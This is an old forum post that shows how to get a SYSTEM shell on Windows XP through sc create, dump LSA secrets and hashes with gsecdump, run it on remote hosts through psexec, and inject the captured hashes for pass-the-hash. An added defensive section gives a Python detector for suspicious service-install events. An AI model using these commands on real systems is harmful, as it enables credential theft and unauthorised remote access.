To get a DOS prompt as NT SYSTEM:

C:\>sc create shellcmdline binpath= "C:\WINDOWS\system32\cmd.exe /K start" type= own type= interact
[SC] CreateService SUCCESS

C:\>sc start shellcmdline
[SC] StartService FAILED 1053:

The service did not respond to the start or control request in a timely fashion.

C:\>sc delete shellcmdline
[SC] DeleteService SUCCESS

------------

Then in the new DOS window:

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>whoami
NT AUTHORITY\SYSTEM

C:\WINDOWS\system32>gsecdump -h
gsecdump v0.6 by Johannes Gumbel (johannes.gumbel@truesec.se)
usage: gsecdump [options]

options:
-h [ --help ] show help
-a [ --dump_all ] dump all secrets
-l [ --dump_lsa ] dump lsa secrets
-w [ --dump_wireless ] dump microsoft wireless connections
-u [ --dump_usedhashes ] dump hashes from active logon sessions
-s [ --dump_hashes ] dump hashes from SAM/AD

Although I like to use:

PsExec v1.83 - Execute processes remotely.
Copyright (C) 2001-2007 Mark Russinovich
Sysinternals - [url]www.sysinternals.com[/url]

C:\>psexec \\COMPUTER -u user -p password -s -f -c gsecdump.exe -u >Active-HASH.TXT

to get the hashes from active logon sessions of a remote system.

These are a lot better than getting a cachedump of the Cached Credentials because these hashes are LMHashes that can be easily broken with Rainbow Tables.

A tip: you can use iam from the pshtools toolkit to import the HASH information just captured with gsecdump into the local lsass process and carry out a hash-injection attack. The foreigners really are good; admins will have their hands full now. The LM/NT hashes obtained during ARP spoofing, and those obtained with gethash, actually never need the password cracked at all; this is just about using the tool. As the original article puts it well, whether the password is 4 characters or 127, once you have the hash it is 100% done.

Original source: [url]http://truesecurity.se/blogs/mur ... -text-password.aspx[/url]

I had a look at the original source; it seems to be from /2007/03/16/. Depressing, what a gap.
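From the defender's side, both tricks in this post leave the same footprint: a service gets installed whose image is a command shell with the interactive flag set (the sc create above), or PsExec installs its own service to run something as SYSTEM. The following is an added example written for this page, not code from the post or from the truesecurity.se article it quotes. It scans records shaped like the EventData of Windows Security event 4697 ("A service was installed in the system"), where ServiceType is a hex string such as 0x110 (SERVICE_WIN32_OWN_PROCESS | SERVICE_INTERACTIVE_PROCESS, exactly what "type= own type= interact" produces). The sample events, the SHELL_BINARIES set and the use of the service name PSEXESVC as a PsExec indicator are this example's own assumptions.

```python
"""Flag service-installation events that look like an interactive cmd.exe
service or a PsExec-installed service.

Input records mimic the EventData fields of Security event 4697:
ServiceName, ServiceFileName, ServiceType (hex string), ServiceStartType,
ServiceAccount. All sample data below is constructed for this example.
"""
import re

SERVICE_INTERACTIVE_PROCESS = 0x100   # winnt.h flag set by "sc create ... type= interact"
SHELL_BINARIES = {"cmd.exe", "powershell.exe"}  # assumption: a shell as a service image is never legitimate
PSEXEC_SERVICE_NAME = "psexesvc"      # assumption: service name PsExec installs on the target

# First token of a Windows command line: either a quoted path or a run of non-space characters.
_FIRST_TOKEN = re.compile(r'^\s*(?:"([^"]*)"|(\S+))')


def image_basename(service_file_name):
    """Return the lowercase file name of the executable in a service ImagePath."""
    m = _FIRST_TOKEN.match(service_file_name)
    if not m:
        return ""
    exe = m.group(1) if m.group(1) is not None else m.group(2)
    return re.split(r"[\\/]", exe)[-1].lower()


def parse_service_type(value):
    """ServiceType in event 4697 is a hex string such as '0x110'; unparsable -> 0."""
    try:
        return int(str(value), 16)
    except ValueError:
        return 0


def classify_service_event(event):
    """Return the list of reasons this 4697-style event is suspicious (empty if none)."""
    reasons = []
    name = event.get("ServiceName", "").lower()
    path = event.get("ServiceFileName", "")
    stype = parse_service_type(event.get("ServiceType", "0x0"))
    exe = image_basename(path)
    if exe in SHELL_BINARIES:
        reasons.append("service image is a command shell (%s)" % exe)
    if stype & SERVICE_INTERACTIVE_PROCESS:
        reasons.append("SERVICE_INTERACTIVE_PROCESS set (type= interact)")
    if name == PSEXEC_SERVICE_NAME:
        reasons.append("PsExec service installed (remote execution as SYSTEM)")
    return reasons


def scan_events(events):
    """Map ServiceName -> reasons for every event that triggers at least one rule."""
    hits = {}
    for event in events:
        reasons = classify_service_event(event)
        if reasons:
            hits[event["ServiceName"]] = reasons
    return hits


# Constructed sample events (not real log data), shaped like 4697 EventData.
SAMPLE_EVENTS = [
    {"ServiceName": "shellcmdline",
     "ServiceFileName": r"C:\WINDOWS\system32\cmd.exe /K start",
     "ServiceType": "0x110", "ServiceStartType": "3", "ServiceAccount": "LocalSystem"},
    {"ServiceName": "PSEXESVC",
     "ServiceFileName": r"%SystemRoot%\PSEXESVC.exe",
     "ServiceType": "0x10", "ServiceStartType": "3", "ServiceAccount": "LocalSystem"},
    {"ServiceName": "ExampleUpdater",   # benign control record
     "ServiceFileName": r'"C:\Program Files\Example\updater.exe" -svc',
     "ServiceType": "0x10", "ServiceStartType": "2", "ServiceAccount": "LocalSystem"},
]

if __name__ == "__main__":
    for service, reasons in scan_events(SAMPLE_EVENTS).items():
        print(service)
        for reason in reasons:
            print("  -", reason)
```

Note that the start failure (error 1053) in the post does not undo the finding: the service process was launched before the Service Control Manager gave up on it, so the 4697 record (and the System-log 7045 record) exists regardless, and a create/start/delete sequence within seconds is itself worth a rule. The System-log 7045 event reports the type as descriptive text ("user mode service") rather than a hex value, so the interactive-flag check above needs 4697 or a periodic `sc qc` inventory.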